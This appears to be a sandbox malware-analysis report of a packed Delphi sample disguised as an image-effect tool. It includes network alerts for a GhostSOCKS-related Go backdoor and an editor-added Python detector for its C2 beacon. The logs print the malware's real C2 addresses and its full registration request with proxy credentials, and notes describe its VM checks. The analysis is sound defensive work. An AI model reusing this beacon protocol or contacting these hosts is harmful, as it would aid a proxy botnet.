user32.dll | WindowFromPoint, WindowFromDC, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LockWindowUpdate, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemRect, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
winspool.drv | OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
shell32.dll | ShellExecuteA
comdlg32.dll | GetSaveFileNameA, GetOpenFileNameA
Description | Data
CompanyName | 
FileDescription | Professional Image Effect
FileVersion | 1.00
InternalName | Professional Image Effect for DELPHI
LegalCopyright | 
OriginalFilename | Professional Image Effect for DELPHI
Developer | Babak Sateli
E-MAIL | babak_sateli@yahoo.com
Translation | 0x0409 0x04e4

Language of compilation system | Country where language is spoken
English | United States
Russian | Russia


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-11T10:55:40.448676+0100 | 2855478 | ETPRO MALWARE Golang Backdoor Activity - Observed GhostSOCKS related | 1 | 192.168.2.11 | 49903 | 46.8.232.106 | 30001 | TCP
2025-02-11T10:55:41.000742+0100 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 185.121.233.152 | 14887 | 192.168.2.11 | 49932 | TCP
2025-02-11T10:55:41.001163+0100 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.11 | 49932 | 185.121.233.152 | 14887 | TCP
2025-02-11T10:56:10.449366+0100 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.11 | 49932 | 185.121.233.152 | 14887 | TCP
2025-02-11T10:56:10.628328+0100 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 185.121.233.152 | 14887 | 192.168.2.11 | 49932 | TCP
• Total Packets: 20
• Destination ports: 30001, 14887 (no registered service name)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 11, 2025 10:55:36.337142944 CET | 49903 | 30001 | 192.168.2.11 | 46.8.232.106
Feb 11, 2025 10:55:36.341950893 CET | 30001 | 49903 | 46.8.232.106 | 192.168.2.11
Feb 11, 2025 10:55:36.345905066 CET | 49903 | 30001 | 192.168.2.11 | 46.8.232.106
Feb 11, 2025 10:55:36.346422911 CET | 49903 | 30001 | 192.168.2.11 | 46.8.232.106
Feb 11, 2025 10:55:36.351176023 CET | 30001 | 49903 | 46.8.232.106 | 192.168.2.11
Feb 11, 2025 10:55:40.402940035 CET | 30001 | 49903 | 46.8.232.106 | 192.168.2.11
Feb 11, 2025 10:55:40.411870003 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:55:40.416686058 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:55:40.416770935 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:55:40.448676109 CET | 49903 | 30001 | 192.168.2.11 | 46.8.232.106
Feb 11, 2025 10:55:41.000741959 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:55:41.001163006 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:55:41.006496906 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:55:56.017523050 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:55:56.022316933 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:00.953023911 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:00.953327894 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:00.958223104 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:10.407001972 CET | 49903 | 30001 | 192.168.2.11 | 46.8.232.106
Feb 11, 2025 10:56:10.411890984 CET | 30001 | 49903 | 46.8.232.106 | 192.168.2.11
Feb 11, 2025 10:56:10.449366093 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:10.454149961 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:10.628328085 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:10.671570063 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:21.132033110 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:21.132390976 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:21.137233019 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:36.148644924 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:36.153506041 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:40.414273024 CET | 49903 | 30001 | 192.168.2.11 | 46.8.232.106
Feb 11, 2025 10:56:40.419260979 CET | 30001 | 49903 | 46.8.232.106 | 192.168.2.11
Feb 11, 2025 10:56:40.666491032 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:40.671468973 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:40.845026016 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:40.891690016 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:41.311499119 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:41.311753035 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:41.318862915 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:56:56.320564985 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:56:56.325393915 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:57:01.493802071 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
Feb 11, 2025 10:57:01.494286060 CET | 49932 | 14887 | 192.168.2.11 | 185.121.233.152
Feb 11, 2025 10:57:01.499170065 CET | 14887 | 49932 | 185.121.233.152 | 192.168.2.11
• 46.8.232.106:30001
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49903 | 46.8.232.106 | 30001 | 7712 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe

Timestamp | Bytes transferred | Direction | Data
Feb 11, 2025 10:55:36.346422911 CET | 294 | OUT | GET /api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse HTTP/1.1
Host: 46.8.232.106:30001
User-Agent: Go-http-client/1.1
X-Api-Key: GAlbhK5H
Accept-Encoding: gzip
Feb 11, 2025 10:55:40.402940035 CET | 1185 | IN | HTTP/1.1 200 OK
Date: Tue, 11 Feb 2025 09:55:40 GMT
Content-Length: 1066
Content-Type: text/plain; charset=utf-8
Data Raw: 31 38 35 2e 31 32 31 2e 32 33 33 2e 31 35 32 3b 31 34 38 38 37 3b 68 51 55 61 74 6d 71 4f 74 52 61 49 70 47 64 63 3a 47 74 78 2f 30 7a 54 2f 54 42 44 34 4b 62 41 36 31 4f 58 2e 69 57 32 38 47 43 33 2e 45 4a 54 32 33 77 70 33 76 62 4d 32 37 47 70 2e 78 64 47 31 48 68 4b 30 4e 6d 56 36 33 6c 55 3a 44 73 74 33 72 41 42 30 50 75 69 30 36 74 34 30 55 71 47 31 39 4f 6c 2f 46 6c 6d 61 43 56 49 70 53 44 44 69 50 61 77 2f 42 34 6e 68 73 67 61 65 65 33 53 6c 52 71 31 70 35 48 30 65 75 41 62 72 34 38 68 2d 4d 6e 74 66 59 47 36 69 51 41 76 72 39 4f 6a 73 73 72 69 74 4b 61 48 2d 4b 39 47 72 4e 41 64 65 63 74 49 67 51 63 76 69 33 45 4e 73 49 7a 4b 74 62 51 76 65 49 52 56 72 68 46 32 2c 31 61 77 68 72 64 44 74 45 31 49 74 4d 4f 6f 70 37 37 44 3a 54 52 70 2f 50 69 56 2f 69 4e 55 34 50 5a 65 36 6c 4b 75 2e 50 44 58 38 52 5a 62 2e 79 4e 52 32 64 54 4c 33 30 39 68 36 47 4b 6c 2e 6e 47 70 36 59 44 41 31 61 77 56 3a 35 39 56 33 42 45 48 30 63 35 56 30 33 6d 53 30 76 74 6b 31 4c 4f 6e 2f 37 55 65 61 69 62 49 70 6d 59 46 [TRUNCATED]
Data Ascii: 185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/TBD4KbA61OX.iW28GC3.EJT23wp3vbM27Gp.xdG1HhK0NmV63lU:Dst3rAB0Pui06t40UqG19Ol/FlmaCVIpSDDiPaw/B4nhsgaee3SlRq1p5H0euAbr48h-MntfYG6iQAvr9OjssritKaH-K9GrNAdectIgQcvi3ENsIzKtbQveIRVrhF2,1awhrdDtE1ItMOop77D:TRp/PiV/iNU4PZe6lKu.PDX8RZb.yNR2dTL309h6GKl.nGp6YDA1awV:59V3BEH0c5V03mS0vtk1LOn/7UeaibIpmYFiLuD/mp1hyhUeGQnlcKPptp0eQVJrTDE-o0jfAhhiOHbrbFjs7ZYtbIC-JiyrdtLeeptgziIiHC6sjuVtXfgeKdRrO3y,OAHhznstfootwqgpcPy:oeQ/2ya/aiA9JRU1qGX.0jt2NHK1cHP2anY.sVd1G9T6U7I6BSV.Dgw9Glh1tLs:sJg3dfQ0jSz0XiE0AyT1NZI/bXoaSJzptOWiu8j/3nTh6Y3eZPfl693pvhpeahlrHvE-rccfaYFi4XIrsE8stq4tCi9-K0ir52oeytkgNYdiYfcsHrbtUxpeVNbrrrz,LT0hf9stUcrtFmxpLdL:Nkd/Lne/wqu9Wbc11c0.MFn2ORD1pP02KXW.pcr13Hc69bE658i.AqI9Acw:Ojo3c9G0faH08LC0xxl1VJv/QUpaEEsp5FliUXk/JfKhpO3e9oclrA2p0JsentQr4Yh-mfMfYzeiY6jr3JzsRqzt3Db-UnLrzM5e6NUgvfpiQIfs6yptqVBepZ7r2cH,WXFhIzAtNMStHzdpaaO:162/baw/bve1tLW4rl77L88.SVy4uSz5gqh.x5v1vCg9gWK6PSM.BLe1hjE5PTN77MK:qcj3Zr708pf0xl90T9T1ZJF/rviasLXp4A5irLN/kbshbYdeXZYl5l6plZVeorJr5SS-gtZft [TRUNCATED]
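The registration exchange above, parsed and checked in Python. This is an added example by the editor, not code from the Joe Sandbox report or from the malware. The request line, its headers and the first two records of the (truncated) response body are copied from the session above and the two flow tuples from the TCP table; the indicator names and the field layout assumed for the response body (host;port;record,record,... with colon-separated fields) are the editor's assumptions, and the benign request is constructed. Two facts from the report drive the checks: the md5 query parameter equals the sample's own MD5 (2E82E1C508AF8197F9A033822E9D742F in the process listing below), and the body returned by 46.8.232.106:30001 names 185.121.233.152:14887, which is exactly where the next TCP flow in the packet table goes.

```python
"""Parse and flag the helper-first-register beacon shown in the session above.

Editor's example, not the report's or the malware's code. Request, truncated
response and flow list are copied from the report; indicator names and the
assumed 'host;port;record,record,...' layout of the body are the editor's.
"""
from __future__ import annotations

import ipaddress
from urllib.parse import parse_qs, urlsplit

# Copied from the OUT record of the 46.8.232.106:30001 session (294 bytes).
SAMPLE_REQUEST = (
    "GET /api/helper-first-register?buildVersion=0z76.pdO2CqG"
    "&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW"
    "&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse HTTP/1.1\r\n"
    "Host: 46.8.232.106:30001\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "X-Api-Key: GAlbhK5H\r\n"
    "Accept-Encoding: gzip\r\n"
    "\r\n"
)

# Constructed benign request that shares Go's default User-Agent.
BENIGN_REQUEST = (
    "GET /healthz HTTP/1.1\r\n"
    "Host: 10.0.0.5:8080\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "\r\n"
)

# First two records of the 1066-byte text/plain body; the report truncates it.
SAMPLE_RESPONSE = (
    "185.121.233.152;14887;"
    "hQUatmqOtRaIpGdc:Gtx/0zT/TBD4KbA61OX.iW28GC3.EJT23wp3vbM27Gp.xdG1HhK0NmV63lU"
    ":Dst3rAB0Pui06t40UqG19Ol/FlmaCVIpSDDiPaw/B4nhsgaee3SlRq1p5H0euAbr48h-Mntf"
    "YG6iQAvr9OjssritKaH-K9GrNAdectIgQcvi3ENsIzKtbQveIRVrhF2,"
    "1awhrdDtE1ItMOop77D:TRp/PiV/iNU4PZe6lKu.PDX8RZb.yNR2dTL309h6GKl.nGp6YDA1awV"
    ":59V3BEH0c5V03mS0vtk1LOn/7UeaibIpmYFiLuD/mp1hyhUeGQnlcKPptp0eQVJrTDE-o0jf"
    "AhhiOHbrbFjs7ZYtbIC-JiyrdtLeeptgziIiHC6sjuVtXfgeKdRrO3y"
)

# (destination IP, destination port) of the two flows in the TCP table.
SAMPLE_FLOWS = [("46.8.232.106", 30001), ("185.121.233.152", 14887)]
SAMPLE_MD5 = "2e82e1c508af8197f9a033822e9d742f"  # MD5 of the analysed file


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query dict and headers."""
    head, _, _ = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")   # first colon only: Host keeps its port
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return {"method": method, "path": url.path, "query": query,
            "headers": headers, "version": version}


def register_beacon_indicators(req: dict, sample_md5: str | None = None) -> list[str]:
    """Return the indicators of the registration beacon present in req (names are the editor's)."""
    hits = []
    if req["method"] == "GET" and req["path"].endswith("/helper-first-register"):
        hits.append("path")
    if req["headers"].get("user-agent", "").startswith("Go-http-client/"):
        hits.append("go-user-agent")           # weak on its own: Go's default UA
    if "x-api-key" in req["headers"]:
        hits.append("x-api-key")
    q = req["query"]
    if {"proxyUsername", "proxyPassword", "userId", "buildVersion"} <= set(q):
        hits.append("proxy-credential-params")
    md5 = q.get("md5", "")
    if len(md5) == 32 and all(c in "0123456789abcdef" for c in md5.lower()):
        hits.append("md5-param")
        if sample_md5 and md5.lower() == sample_md5.lower():
            hits.append("md5-is-self-hash")    # the bot reports its own file hash
    return hits


def parse_register_response(body: str) -> dict:
    """Split 'host;port;rec,rec,...' into the next endpoint and its records.

    Only host and port are understood; treating the remainder as comma-separated
    records of colon-separated fields is an assumption about an opaque blob.
    """
    host, port_s, blob = body.split(";", 2)
    ipaddress.IPv4Address(host)                # raises on anything but a dotted quad
    port = int(port_s)
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    records = [rec.split(":") for rec in blob.split(",") if rec]
    return {"host": host, "port": port, "records": records}


def next_stage_contacted(resp: dict, flows: list[tuple[str, int]]) -> bool:
    """True if the endpoint handed out by the registration server shows up in the flows."""
    return (resp["host"], resp["port"]) in flows


if __name__ == "__main__":
    req = parse_http_request(SAMPLE_REQUEST)
    print("indicators:", register_beacon_indicators(req, SAMPLE_MD5))
    resp = parse_register_response(SAMPLE_RESPONSE)
    print(f"next stage {resp['host']}:{resp['port']}, {len(resp['records'])} records,",
          "seen in pcap:", next_stage_contacted(resp, SAMPLE_FLOWS))
```

Go-http-client/1.1 is the default User-Agent of Go's net/http and is common in legitimate tooling, so the UA by itself is a weak indicator; register_beacon_indicators therefore returns the matched indicators rather than a verdict, and the constructed benign request scores only that one. The endpoint pivot is the useful part for incident response: once the registration body is decoded, the second C2 (185.121.233.152:14887) can be blocked or hunted for before the pcap is fully reviewed.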



                  Target ID:0
                  Start time:04:55:00
                  Start date:11/02/2025
                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe"
                  Imagebase:0x6c0000
                  File size:6'808'576 bytes
                  MD5 hash:2E82E1C508AF8197F9A033822E9D742F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Yara matches:
                  • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Target ID:5
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 780
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 796
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 816
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

Execution Graph

Execution Coverage: 0.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 13
Total number of Limit Nodes: 1

Execution graph (rendered figure; only its node and edge list survived extraction): the executed path in the unpacked region starts at 3126b0d, calls the helper at 3121131 (which branches via 312115c to LoadLibraryA at 31211e3 and 3121200, or via 312116b), then calls CreateFileW at 3126b29, calls 3121131/LoadLibraryA again from 3126b47 and 3126b59, reaches CloseHandle at 3126b70 and ends at 3126b9a.

                  Executed Functions

Control-flow Graph (rendered figure, executed function): basic block 3126b0d-3126b45 (call 3121131, CreateFileW) branches to 3126b47-3126b98 (call 3121131 twice, CloseHandle) or straight to the exit block 3126ba8; 3126b47-3126b98 exits to 3126ba8 directly or through 3126b9a-3126ba0.
                  APIs
                  • CreateFileW.KERNELBASE(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03126B40
                    • Part of subcall function 03121131: LoadLibraryA.KERNEL32(NTDLL,?), ref: 031211F9
                  • CloseHandle.KERNELBASE(00000000), ref: 03126B71
                  Strings
                  • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, xrefs: 03126B3B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandleLibraryLoad
                  • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  • API String ID: 2506845977-210220030
                  • Opcode ID: dede261e609b68da2b26da8cd33a9daf05d0b196f5f942b8f0ad69fcd8326a1d
                  • Instruction ID: 37324268fbe5a9855a30746aa99fef1a9f0eca76dcdd4c3fe466821e40ebc3a8
                  • Opcode Fuzzy Hash: dede261e609b68da2b26da8cd33a9daf05d0b196f5f942b8f0ad69fcd8326a1d
                  • Instruction Fuzzy Hash: C201FC357142156FEB19EB78CC82F2CBB90AB89314F298224F024EF0E8CFB0E4608704

                  Non-executed Functions

Control-flow Graph (rendered figure, non-executed function 3121f6c-31221f8): entry block 3121f6c-3121f84 with an optional call to 3121131 at 3121f8a, followed by a chain of compare-and-branch blocks that call 31262c7 seven times (3122014, 3122030, 3122097, 31220b3, 31220cf, 31220eb, 3122107) and 3121227 once (3122123), then a loop over 3122187-31221dc that exits through 31221de-31221ed to 31221f5-31221f8.
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
• String ID: Basi$Micr$Para$RDPU$VMwa$VMwa$llel$reVM$t Hv$ware
• Analyst note: these 4-byte fragments are what compiler-emitted dword-immediate string comparisons leave behind. "VMwa", "reVM", "ware" assemble to "VMwareVMware" and "Micr" ... "t Hv" to "Microsoft Hv", the hypervisor vendor strings returned by CPUID leaf 0x40000000, i.e. a virtual-machine check; "Para"/"llel" fits "Parallels". The remaining fragments are not identified here. The function is listed under Non-executed Functions, so the check did not run in this analysis.
                  • API String ID: 0-710289715
                  • Opcode ID: 74239c9c7b16b21aa04fe377b8163202acf5c4f4e685acb1310240db984c9c11
                  • Instruction ID: 509de4b8d48431b865364dba47db2c85c3d25dd11c930f3e9988108927cbe621
                  • Opcode Fuzzy Hash: 74239c9c7b16b21aa04fe377b8163202acf5c4f4e685acb1310240db984c9c11
                  • Instruction Fuzzy Hash: DA51A378701219EFDB59EB90C884F9DBB75BF4C701F5846A0E6048A1C9C770E9D2CBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
• String ID: header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
• Analyst note: these are the verbatim error strings of the zlib inflate routine, so the dumped region carries a decompressor. That is consistent with the payload being decompressed at runtime: the GO Backdoor Yara rule above matched a memory dump (00000000.00000002.2581726494.000000000C940000...), not the file on disk.
                  • API String ID: 0-3633268661
                  • Opcode ID: 51fb4cac4f8a2bf5199512ce453f2594e57f0f9f11454ea1ed87b5b995060f26
                  • Instruction ID: 4905a8195449975b717ce8279f5a347b3e812b6776b5c20238d35b2f74f1d73f
                  • Opcode Fuzzy Hash: 51fb4cac4f8a2bf5199512ce453f2594e57f0f9f11454ea1ed87b5b995060f26
                  • Instruction Fuzzy Hash: 9A626AB1E00215AFDB14DF59C9846ADFBF5BF4A304F2881A9D818AB352D735DA43CB90
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bb14d30d809129b8e6f0c0766e2083740a43fad8b7dc4135de1c2b7f3338b818
                  • Instruction ID: cc6a4f4365fa0118a0f333da762e27c2e69996be6159ec633c17db3b0652e44d
                  • Opcode Fuzzy Hash: bb14d30d809129b8e6f0c0766e2083740a43fad8b7dc4135de1c2b7f3338b818
                  • Instruction Fuzzy Hash: 2242A075E00229ABDF14DFA9D8407AEFFB5FF0C324F184569E814A7291E735A9708B90
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3121000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24f1b031a1f8a5deda89d9838ca26a94a794960f85ee8a27e340a26a4ab77aa1
                  • Instruction ID: 9a53ddbcef7e6bda6de13a5a58b9c094612c1ec31438d9a50e2250270e44bcd3
                  • Opcode Fuzzy Hash: 24f1b031a1f8a5deda89d9838ca26a94a794960f85ee8a27e340a26a4ab77aa1
                  • Instruction Fuzzy Hash: D6F16D756092118FC709CF18D4D48F5BBF1AFA9310B1E82FDD8899B3A6D731A984CB51
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false

                  Control-flow Graph

                  APIs
                  • lstrcpyW.KERNEL32(0314C4EF,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe), ref: 03123C51
                  • lstrcpyW.KERNEL32(0314C6FB,03144FB5), ref: 03123C61
                  • lstrcpyW.KERNEL32(0314C72B,031454B5), ref: 03123C71
                  • lstrlenW.KERNEL32(031454B5), ref: 03123C7C
                  • lstrcpyW.KERNEL32(0314C933,031432CC,03146F9E,031432CC), ref: 03123CA8
                  • lstrcpy.KERNEL32(0314C993,03146F9E), ref: 03123CB8
                  Strings
                  • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, xrefs: 03123C47
                  Memory Dump Source
                  • Source File: 00000000.00000002.2576426837.0000000003121000.00000040.00001000.00020000.00000000.sdmp, Offset: 03121000, based on PE: false
